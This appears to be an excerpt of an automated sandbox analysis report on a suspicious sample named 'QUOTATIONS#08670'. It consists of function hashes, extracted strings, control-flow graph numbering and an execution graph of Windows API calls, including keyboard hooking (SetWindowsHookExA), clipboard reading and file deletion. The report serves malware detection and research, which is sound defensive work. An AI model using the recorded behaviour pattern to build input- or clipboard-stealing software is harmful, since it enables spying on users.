                                                          • Instruction Fuzzy Hash: 53D1EDB07016158FEB19FB76C494B6EB7EAAF89708F1444ADD10A8B2A4DF35E802C751
                                                          Function 06D2D210 Relevance: .3, Instructions: 318COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2022576283.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6d20000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 803bfdf0207cefaed7fcadfab11481507036e25943697785830ac533e221bf10
                                                          • Instruction ID: 0cb84a11c8b7fb4dd08f55c71656dd00906fec47a35b7bf17971aa52026e6698
                                                          • Opcode Fuzzy Hash: 803bfdf0207cefaed7fcadfab11481507036e25943697785830ac533e221bf10
                                                          • Instruction Fuzzy Hash: 2AA19470B002556FDB98ABB8842476F7AA7AFC8305F24856CD00ADB398CE349D47C7D2
                                                          Function 0712DD6F Relevance: .3, Instructions: 265COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c5db4f64df03557735583d145f2f93510bf1e04300da7cceb41266a915309ec
                                                          • Instruction ID: d316f7b2dc8cf96eb7529241d2517edf681424363a06dd1723b420c6f805e50a
                                                          • Opcode Fuzzy Hash: 7c5db4f64df03557735583d145f2f93510bf1e04300da7cceb41266a915309ec
                                                          • Instruction Fuzzy Hash: 77D10B31D10B5A8ACB10EFA4D991A9DF771FF95300F20D79AE50977628EBB06AC4CB41
                                                          Function 07927E28 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5779fe6ccb1a2d0334b5aab6014f110326ae5be0bbb30039bae7901785ca5d59
                                                          • Instruction ID: 22981c385ce269cf5d39c9cf659563fd7aecf9d546a61df685ea244b45518155
                                                          • Opcode Fuzzy Hash: 5779fe6ccb1a2d0334b5aab6014f110326ae5be0bbb30039bae7901785ca5d59
                                                          • Instruction Fuzzy Hash: 39B125B0E15229CBCF44DFA5D945ADDFBF2FB89304F109929C50ABB258D7389902CB24
                                                          Function 0712DD70 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfcd77c70a6c5e29c23ca9e7467fa082a088b60db0d942160ece09068accf2fd
                                                          • Instruction ID: cadcf6b781c0d990d39e5e05678119759d5eb0c6c26b836d27510ec0c3673e63
                                                          • Opcode Fuzzy Hash: dfcd77c70a6c5e29c23ca9e7467fa082a088b60db0d942160ece09068accf2fd
                                                          • Instruction Fuzzy Hash: A1D10B31D10B5A8ACB10EFA4D991A9DF771FF95300F20D79AE50977628EBB06AC4CB41
                                                          Function 07928590 Relevance: .2, Instructions: 215COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d4b4e0a1aa2ffdf798db941226d7c888f798eb5fc6d1d5094f91e492b4beee3
                                                          • Instruction ID: 62fb7266aba27aac6379f185ff80899e3049700bce00f8acd4fd82de99144262
                                                          • Opcode Fuzzy Hash: 6d4b4e0a1aa2ffdf798db941226d7c888f798eb5fc6d1d5094f91e492b4beee3
                                                          • Instruction Fuzzy Hash: 83A130B0E111298FCB14DF69C980AAEFBB6FF89304F24D159D408A7359D7309A42CF65
                                                          Function 07926828 Relevance: .2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e1896cc2fc993aefb2b573c3649f04a3fac0b907b7aa506f68d96dcc458a076
                                                          • Instruction ID: 4bb00308d12c94aa0829f9c58693b76039b1db0c378640288fd23074aee32f96
                                                          • Opcode Fuzzy Hash: 2e1896cc2fc993aefb2b573c3649f04a3fac0b907b7aa506f68d96dcc458a076
                                                          • Instruction Fuzzy Hash: DA813DB0E151298FCB14DF69C980A9EFBB6FF89304F24C1A9D418A7759DB309A41DF50
                                                          Function 07926827 Relevance: .2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0125f5e474ba6352025e51db06ef83c968443a7760e96ff243811f3586fd0ced
                                                          • Instruction ID: ccfb39352b138c33db991460f93a5616c9554b730f443a963aef84849a15a256
                                                          • Opcode Fuzzy Hash: 0125f5e474ba6352025e51db06ef83c968443a7760e96ff243811f3586fd0ced
                                                          • Instruction Fuzzy Hash: 6E713EB4E112298FCB14DF69C980A9EBBF6FF89304F14C1A9D408A7759DB309A41DF60
                                                          Function 079237D8 Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 562af0fca5eb9c42340599ce57adb43c4bfe383d25accfd1fef4d4111c15712f
                                                          • Instruction ID: 20ffb4b6eba7f90d1ecea805013f6428d39a4292f858e3909b833425156f4314
                                                          • Opcode Fuzzy Hash: 562af0fca5eb9c42340599ce57adb43c4bfe383d25accfd1fef4d4111c15712f
                                                          • Instruction Fuzzy Hash: CC5151B4E11129CBCB14DFAAC9805AEFBF6FF89304F24D56AD418A7209D7345A42CF61
                                                          Function 07920040 Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2b30c2585d7cc4c26db0c67a4974ceffa99d2153f153e5388a5641b2d3f6b3c
                                                          • Instruction ID: 858616619d0ffd51d23cdfd59725d6a3773fd02c8cdcaac238c09dfb805d56cc
                                                          • Opcode Fuzzy Hash: c2b30c2585d7cc4c26db0c67a4974ceffa99d2153f153e5388a5641b2d3f6b3c
                                                          • Instruction Fuzzy Hash: 57514AB1E116188BDB58DF6B8D4579EFAF7BFC9300F14C1BA850DA6224DB341A868F11
                                                          Function 0792003A Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39f20cedfcb0bd3412fd31db7aad521598c3570dcfd15a9d38601eb5ef8239b6
                                                          • Instruction ID: 431afeb1e99b0f9f8965440abc14c2aa992873467d1ea13da29b853962319e04
                                                          • Opcode Fuzzy Hash: 39f20cedfcb0bd3412fd31db7aad521598c3570dcfd15a9d38601eb5ef8239b6
                                                          • Instruction Fuzzy Hash: F5413AB1E116198BEB58DF6B8D4478AFBF3BFC9300F14C1BA954CA6264DB341A858F11
                                                          Function 008F7928 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \;_q$\;_q$\;_q$\;_q
                                                          • API String ID: 0-294077808
                                                          • Opcode ID: ba1903b1b9715e70117b4772aaa30983d7ff8f1b6277371a4180c3fb7a1d42ac
                                                          • Instruction ID: a0b07b5df4bfc38827fd26a034b0a8f52e5d7968bce4d6beb6d0e2c6d5f14ae1
                                                          • Opcode Fuzzy Hash: ba1903b1b9715e70117b4772aaa30983d7ff8f1b6277371a4180c3fb7a1d42ac
                                                          • Instruction Fuzzy Hash: 4D019A3271810D8FEBA48E3CC4949357BEAFF88B60735456AE201CB378DAA4DC42C780

                                                          Execution Graph

                                                          Execution Coverage:12.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:190
                                                          Total number of Limit Nodes:22
                                                          execution_graph 38975 141d030 38976 141d048 38975->38976 38977 141d0a2 38976->38977 38984 6bc3e7c 38976->38984 38992 6bc6690 38976->38992 38998 6bcb270 38976->38998 39006 6bc3e75 38976->39006 39014 6bc668a 38976->39014 39020 6bc3e6c 38976->39020 38985 6bc3e87 38984->38985 38986 6bcb2f1 38985->38986 38988 6bcb2e1 38985->38988 38989 6bcb2ef 38986->38989 39032 6bcae80 38986->39032 39024 6bcb418 38988->39024 39028 6bcb408 38988->39028 38993 6bc66b6 38992->38993 38994 6bc3e6c GetModuleHandleW 38993->38994 38995 6bc66c2 38994->38995 38996 6bc3e7c CallWindowProcW 38995->38996 38997 6bc66d7 38996->38997 38997->38977 38999 6bcb275 38998->38999 39000 6bcb2f1 38999->39000 39002 6bcb2e1 38999->39002 39001 6bcae80 CallWindowProcW 39000->39001 39003 6bcb2ef 39000->39003 39001->39003 39004 6bcb418 CallWindowProcW 39002->39004 39005 6bcb408 CallWindowProcW 39002->39005 39004->39003 39005->39003 39007 6bc3e87 39006->39007 39008 6bcb2f1 39007->39008 39010 6bcb2e1 39007->39010 39009 6bcae80 CallWindowProcW 39008->39009 39011 6bcb2ef 39008->39011 39009->39011 39012 6bcb418 CallWindowProcW 39010->39012 39013 6bcb408 CallWindowProcW 39010->39013 39012->39011 39013->39011 39015 6bc66b6 39014->39015 39016 6bc3e6c GetModuleHandleW 39015->39016 39017 6bc66c2 39016->39017 39018 6bc3e7c CallWindowProcW 39017->39018 39019 6bc66d7 39018->39019 39019->38977 39021 6bc3e77 39020->39021 39036 6bc67b0 39021->39036 39023 6bc6bc7 39023->38977 39026 6bcb426 39024->39026 39025 6bcae80 CallWindowProcW 39025->39026 39026->39025 39027 6bcb502 39026->39027 39027->38989 39030 6bcb426 39028->39030 39029 6bcae80 CallWindowProcW 39029->39030 39030->39029 39031 6bcb502 39030->39031 39031->38989 39033 6bcae8b 39032->39033 39034 6bcb5b2 CallWindowProcW 39033->39034 39035 6bcb561 39033->39035 39034->39035 39035->38989 39037 6bc67bb 39036->39037 39038 6bc3d44 GetModuleHandleW 39037->39038 39039 6bc6c97 39037->39039 39038->39039 38848 6bc64d8 38849 6bc6540 CreateWindowExW 38848->38849 38851 6bc65fc 38849->38851 38851->38851 39040 6bcbcc8 39041 6bcbcd3 39040->39041 39045 6bcbce3 39041->39045 39047 6bcb10c 39041->39047 39042 6bcbd03 39044 6bcbd1b OleInitialize 39046 6bcbd7c 39044->39046 39045->39042 39045->39044 39048 6bcbd18 OleInitialize 39047->39048 39050 6bcbd7c 39048->39050 39050->39045 39051 6bcdc28 39052 6bcdc6c SetWindowsHookExA 39051->39052 39054 6bcdcb2 39052->39054 39055 6bc5428 39056 6bc5478 GetModuleHandleW 39055->39056 39057 6bc5472 39055->39057 39058 6bc54a5 39056->39058 39057->39056 39059 6bca028 39060 6bca06e GetCurrentProcess 39059->39060 39062 6bca0b9 39060->39062 39063 6bca0c0 GetCurrentThread 39060->39063 39062->39063 39064 6bca0fd GetCurrentProcess 39063->39064 39065 6bca0f6 39063->39065 39066 6bca133 39064->39066 39065->39064 39067 6bca15b GetCurrentThreadId 39066->39067 39068 6bca18c 39067->39068 38852 6bca270 DuplicateHandle 38853 6bca306 38852->38853 39069 6bcbe60 39070 6bcbeba OleGetClipboard 39069->39070 39071 6bcbefa 39070->39071 38854 1460848 38855 146084e 38854->38855 38856 146091b 38855->38856 38858 1461340 38855->38858 38860 1461356 38858->38860 38859 1461454 38859->38855 38860->38859 38864 1468211 38860->38864 38870 6bc3840 38860->38870 38876 6bc3821 38860->38876 38865 146821b 38864->38865 38869 14682d1 38865->38869 38882 6bef9b8 38865->38882 38887 6bef9a9 38865->38887 38892 6befbf9 38865->38892 38869->38860 38871 6bc3852 38870->38871 38874 6bc3903 38871->38874 38921 6bc35cc 38871->38921 38873 6bc38c9 38926 6bc35ec 38873->38926 38874->38860 38877 6bc3840 38876->38877 38878 6bc35cc GetModuleHandleW 38877->38878 38880 6bc3903 38877->38880 38879 6bc38c9 38878->38879 38881 6bc35ec KiUserCallbackDispatcher 38879->38881 38880->38860 38881->38880 38884 6bef9cd 38882->38884 38883 6befbe2 38883->38869 38884->38883 38885 6befbf9 GlobalMemoryStatusEx GlobalMemoryStatusEx 38884->38885 38886 6befe54 GlobalMemoryStatusEx GlobalMemoryStatusEx 38884->38886 38885->38884 38886->38884 38889 6bef9cd 38887->38889 38888 6befbe2 38888->38869 38889->38888 38890 6befbf9 GlobalMemoryStatusEx GlobalMemoryStatusEx 38889->38890 38891 6befe54 GlobalMemoryStatusEx GlobalMemoryStatusEx 38889->38891 38890->38889 38891->38889 38893 6bef9cd 38892->38893 38896 6befc02 38892->38896 38895 6befbe2 38893->38895 38900 6befbf9 GlobalMemoryStatusEx GlobalMemoryStatusEx 38893->38900 38901 6befe54 GlobalMemoryStatusEx GlobalMemoryStatusEx 38893->38901 38894 6befc51 38894->38869 38895->38869 38896->38894 38902 146ecd8 38896->38902 38906 146ece8 38896->38906 38897 6befd37 38897->38869 38900->38893 38901->38893 38903 146ece8 38902->38903 38909 146ed10 38903->38909 38904 146ecf6 38904->38897 38908 146ed10 2 API calls 38906->38908 38907 146ecf6 38907->38897 38908->38907 38910 146ed55 38909->38910 38911 146ed2d 38909->38911 38916 146ed10 GlobalMemoryStatusEx 38910->38916 38918 146edf8 38910->38918 38911->38904 38912 146ed76 38912->38904 38913 146ed72 38913->38912 38914 146ee3e GlobalMemoryStatusEx 38913->38914 38915 146ee6e 38914->38915 38915->38904 38916->38913 38919 146ee3e GlobalMemoryStatusEx 38918->38919 38920 146ee6e 38919->38920 38920->38913 38922 6bc35d7 38921->38922 38930 6bc49eb 38922->38930 38936 6bc4a00 38922->38936 38923 6bc3aa2 38923->38873 38927 6bc35f7 38926->38927 38929 6bcb83b 38927->38929 38971 6bcaed4 38927->38971 38929->38874 38931 6bc4a00 38930->38931 38942 6bc4f70 38931->38942 38932 6bc4aae 38933 6bc3d44 GetModuleHandleW 38932->38933 38934 6bc4ada 38932->38934 38933->38934 38937 6bc4a2b 38936->38937 38941 6bc4f70 GetModuleHandleW 38937->38941 38938 6bc4aae 38939 6bc3d44 GetModuleHandleW 38938->38939 38940 6bc4ada 38938->38940 38939->38940 38941->38938 38943 6bc4fad 38942->38943 38944 6bc502e 38943->38944 38947 6bc50ea 38943->38947 38957 6bc50f0 38943->38957 38948 6bc50f0 38947->38948 38951 6bc5129 38948->38951 38967 6bc3d44 38948->38967 38950 6bc52f4 38950->38944 38951->38950 38952 6bc3d44 GetModuleHandleW 38951->38952 38953 6bc527a 38952->38953 38953->38950 38954 6bc3d44 GetModuleHandleW 38953->38954 38955 6bc52c8 38954->38955 38955->38950 38956 6bc3d44 GetModuleHandleW 38955->38956 38956->38950 38958 6bc5105 38957->38958 38959 6bc3d44 GetModuleHandleW 38958->38959 38961 6bc5129 38958->38961 38959->38961 38960 6bc52f4 38960->38944 38961->38960 38962 6bc3d44 GetModuleHandleW 38961->38962 38963 6bc527a 38962->38963 38963->38960 38964 6bc3d44 GetModuleHandleW 38963->38964 38965 6bc52c8 38964->38965 38965->38960 38966 6bc3d44 GetModuleHandleW 38965->38966 38966->38960 38968 6bc5430 GetModuleHandleW 38967->38968 38970 6bc54a5 38968->38970 38970->38951 38972 6bcb850 KiUserCallbackDispatcher 38971->38972 38974 6bcb8be 38972->38974 38974->38927 39072 1468038 39073 146807e DeleteFileW 39072->39073 39075 14680b7 39073->39075

                                                          Executed Functions

                                                          Function 06BE34B0 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 125 6be34b0-6be34d1 126 6be34d3-6be34d6 125->126 127 6be34fc-6be34ff 126->127 128 6be34d8-6be34f7 126->128 129 6be3505-6be3524 127->129 130 6be3ca0-6be3ca2 127->130 128->127 138 6be353d-6be3547 129->138 139 6be3526-6be3529 129->139 132 6be3ca9-6be3cac 130->132 133 6be3ca4 130->133 132->126 135 6be3cb2-6be3cbb 132->135 133->132 142 6be354d-6be355e call 6be237c 138->142 139->138 140 6be352b-6be353b 139->140 140->142 145 6be3563-6be3568 142->145 146 6be356a-6be3570 145->146 147 6be3575-6be3852 145->147 146->135 168 6be3858-6be3907 147->168 169 6be3c92-6be3c9f 147->169 178 6be3909-6be392e 168->178 179 6be3930 168->179 181 6be3939-6be394c call 6be2388 178->181 179->181 184 6be3c79-6be3c85 181->184 185 6be3952-6be3974 call 6be2394 181->185 184->168 186 6be3c8b 184->186 185->184 189 6be397a-6be3984 185->189 186->169 189->184 190 6be398a-6be3995 189->190 190->184 191 6be399b-6be3a71 190->191 203 6be3a7f-6be3aaf 191->203 204 6be3a73-6be3a75 191->204 208 6be3abd-6be3ac9 203->208 209 6be3ab1-6be3ab3 203->209 204->203 210 6be3acb-6be3acf 208->210 211 6be3b29-6be3b2d 208->211 209->208 210->211 214 6be3ad1-6be3afb 210->214 212 6be3c6a-6be3c73 211->212 213 6be3b33-6be3b6f 211->213 212->184 212->191 225 6be3b7d-6be3b8b 213->225 226 6be3b71-6be3b73 213->226 221 6be3afd-6be3aff 214->221 222 6be3b09-6be3b26 call 6be23a0 214->222 221->222 222->211 229 6be3b8d-6be3b98 225->229 230 6be3ba2-6be3bad 225->230 226->225 229->230 233 6be3b9a 229->233 234 6be3baf-6be3bb5 230->234 235 6be3bc5-6be3bd6 230->235 233->230 236 6be3bb9-6be3bbb 234->236 237 6be3bb7 234->237 239 6be3bee-6be3bfa 235->239 240 6be3bd8-6be3bde 235->240 236->235 237->235 244 6be3bfc-6be3c02 239->244 245 6be3c12-6be3c63 239->245 241 6be3be2-6be3be4 240->241 242 6be3be0 240->242 241->239 242->239 246 6be3c06-6be3c08 244->246 247 6be3c04 244->247 245->212 246->245 247->245
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q$$_q$$_q$$_q$$_q
                                                          • API String ID: 0-155944776
                                                          • Opcode ID: d84ffeca6afd4f86605fa76fa70407b01d7d490810e5ba0e8d6af8afe2c3f4d5
                                                          • Instruction ID: 836289f9a354f9b329cef8ce92bd3e8a0a1e053febc4291fe787c284f128d239
                                                          • Opcode Fuzzy Hash: d84ffeca6afd4f86605fa76fa70407b01d7d490810e5ba0e8d6af8afe2c3f4d5
                                                          • Instruction Fuzzy Hash: 18321E30E1065ACFCB14EF75D95459DB7B6FFC9300F20C6AAD409AB264EB70A985CB81
                                                          Function 06BE7DC8 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 675 6be7dc8-6be7de6 676 6be7de8-6be7deb 675->676 677 6be7e0c-6be7e0f 676->677 678 6be7ded-6be7e07 676->678 679 6be7e26-6be7e29 677->679 680 6be7e10-6be7e1f 677->680 678->677 682 6be7e4c-6be7e4f 679->682 683 6be7e2b-6be7e47 679->683 690 6be7e6e-6be7e84 680->690 691 6be7e21-6be7e24 680->691 684 6be7e5c-6be7e5e 682->684 685 6be7e51-6be7e5b 682->685 683->682 687 6be7e65-6be7e68 684->687 688 6be7e60 684->688 687->676 687->690 688->687 695 6be809f-6be80a9 690->695 696 6be7e8a-6be7e93 690->696 691->679 697 6be80aa-6be80df 696->697 698 6be7e99-6be7eb6 696->698 703 6be80e1-6be80e4 697->703 704 6be808c-6be8099 698->704 705 6be7ebc-6be7ee4 698->705 706 6be80e6-6be8102 703->706 707 6be8107-6be810a 703->707 704->695 704->696 705->704 719 6be7eea-6be7ef3 705->719 706->707 708 6be833f-6be8342 707->708 709 6be8110-6be811f 707->709 712 6be83ed-6be83ef 708->712 713 6be8348-6be8354 708->713 721 6be813e-6be8182 709->721 722 6be8121-6be813c 709->722 716 6be83f6-6be83f9 712->716 717 6be83f1 712->717 723 6be835f-6be8361 713->723 716->703 718 6be83ff-6be8408 716->718 717->716 719->697 724 6be7ef9-6be7f15 719->724 734 6be8188-6be8199 721->734 735 6be8313-6be8329 721->735 722->721 725 6be8379-6be837d 723->725 726 6be8363-6be8369 723->726 739 6be807a-6be8086 724->739 740 6be7f1b-6be7f45 724->740 728 6be837f-6be8389 725->728 729 6be838b 725->729 731 6be836d-6be836f 726->731 732 6be836b 726->732 733 6be8390-6be8392 728->733 729->733 731->725 732->725 737 6be8394-6be8397 733->737 738 6be83a3-6be83dc 733->738 745 6be82fe-6be830d 734->745 746 6be819f-6be81bc 734->746 735->708 737->718 738->709 761 6be83e2-6be83ec 738->761 739->704 739->719 757 6be7f4b-6be7f73 740->757 758 6be8070-6be8075 740->758 745->734 745->735 746->745 756 6be81c2-6be82b8 call 6be65e8 746->756 809 6be82ba-6be82c4 756->809 810 6be82c6 756->810 757->758 766 6be7f79-6be7fa7 757->766 758->739 766->758 772 6be7fad-6be7fb6 766->772 772->758 773 6be7fbc-6be7fee 772->773 781 6be7ff9-6be8015 773->781 782 6be7ff0-6be7ff4 773->782 781->739 783 6be8017-6be806e call 6be65e8 781->783 782->758 784 6be7ff6 782->784 783->739 784->781 811 6be82cb-6be82cd 809->811 810->811 811->745 812 6be82cf-6be82d4 811->812 813 6be82d6-6be82e0 812->813 814 6be82e2 812->814 815 6be82e7-6be82e9 813->815 814->815 815->745 816 6be82eb-6be82f7 815->816 816->745
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q$$_q
                                                          • API String ID: 0-458585787
                                                          • Opcode ID: 661cf952ab0f0e74962ebf3e642a5916948ba9c0e7bdcedf1dc51182884450ed
                                                          • Instruction ID: 08251727a82a3377b4769f7cefd1c8296db2b4778859698669feac162d981b6d
                                                          • Opcode Fuzzy Hash: 661cf952ab0f0e74962ebf3e642a5916948ba9c0e7bdcedf1dc51182884450ed
                                                          • Instruction Fuzzy Hash: 6E02AE70B006068FDB54DF65D990BAEB7A2FF84304F1485A9E806EB395DB35EC46CB81
                                                          Function 06BE55E8 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $
                                                          • API String ID: 0-3993045852
                                                          • Opcode ID: 090a68761edcd1e6860f180fddad665df7213e45f2619f331d56f5ca1bcf44fe
                                                          • Instruction ID: 04f25d9b19e9d847d503c5e974f795d7e0ea16e0772e865796630bd1f970e678
                                                          • Opcode Fuzzy Hash: 090a68761edcd1e6860f180fddad665df7213e45f2619f331d56f5ca1bcf44fe
                                                          • Instruction Fuzzy Hash: BB22D4B6E002059FDF64DFA4C4906AEBBB2FF85318F2084A9D455AB355DB36DC42CB90
                                                          Function 06BE2728 Relevance: 1.0, Instructions: 1045COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f29d59d05ac19d549d5de68a3513280ef813d97c02f8625340573d8a025100d
                                                          • Instruction ID: 457477470d919cdd011de13f32369b6882aa11cab63acf05cdce26541f7de5f4
                                                          • Opcode Fuzzy Hash: 2f29d59d05ac19d549d5de68a3513280ef813d97c02f8625340573d8a025100d
                                                          • Instruction Fuzzy Hash: 24924574E00204CFDB64DB68C584A9DBBF2FF48314F5494AAD409AB366DB35ED86CB90
                                                          Function 06BE6638 Relevance: .8, Instructions: 820COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 081d4d673ce78a8b14e489e657fd2d56088061da508127133f63b429dd13d950
                                                          • Instruction ID: fad8cb90b2bdf4d34520bb332514234d4c3f96733d93de05d0f828e47339a9c7
                                                          • Opcode Fuzzy Hash: 081d4d673ce78a8b14e489e657fd2d56088061da508127133f63b429dd13d950
                                                          • Instruction Fuzzy Hash: D062AC74B102058FDB54DB68D594BADB7F2EF88314F1484A9E806EB395EB35EC46CB80
                                                          Function 06BEB4DC Relevance: .6, Instructions: 557COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fa7945f884c5b6961a4527a344373c3d1809170212cfbe547f7f59956b6a12f
                                                          • Instruction ID: af33fde3807306293b971f6e4a3d806a90ab28347f6ee31f98991fa8f7fcfb75
                                                          • Opcode Fuzzy Hash: 8fa7945f884c5b6961a4527a344373c3d1809170212cfbe547f7f59956b6a12f
                                                          • Instruction Fuzzy Hash: E81260B0E101098FDF64DB68D6907ADB7B2FB45310F2499AAE405EB395CB34DC85CB91
                                                          Function 06BEAD20 Relevance: 10.4, Strings: 8, Instructions: 389COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
